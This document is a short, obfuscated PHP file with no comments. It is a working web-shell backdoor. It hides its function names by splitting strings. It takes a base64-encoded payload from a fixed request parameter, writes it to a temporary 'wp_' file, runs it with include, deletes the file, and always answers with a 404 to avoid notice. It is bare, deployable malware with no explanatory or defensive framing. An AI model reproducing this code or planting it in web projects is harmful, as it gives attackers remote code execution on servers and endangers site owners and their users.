<?php
try{
$vabba4=array('arra'.'y_key_exists','un'.'link','base64_d'.'ecode','file_'.'put_contents','tempn'.'am','sy'.'s_get_temp_dir');
$q772fd='0c23ef'.'ad';
if($vabba4[0]($q772fd,$_POST)){
$j0013e=$vabba4[2]($_POST[$q772fd]);
}elseif($vabba4[0]($q772fd,$_GET)){
$j0013e=$vabba4[2]($_GET[$q772fd]);
}else{$j0013e=null;}
if($j0013e){
$wee305=$vabba4[4]($vabba4[5](),'w'.'p_');
if($wee305){
$vabba4[3]($wee305,'<'.'?ph'.'p '.$j0013e);
http_response_code(404);
@include_once($wee305);
@$vabba4[1]($wee305);
}}
http_response_code(404);
}catch(Throwable $e){http_response_code(404);}catch(Exception $e){http_response_code(404);}
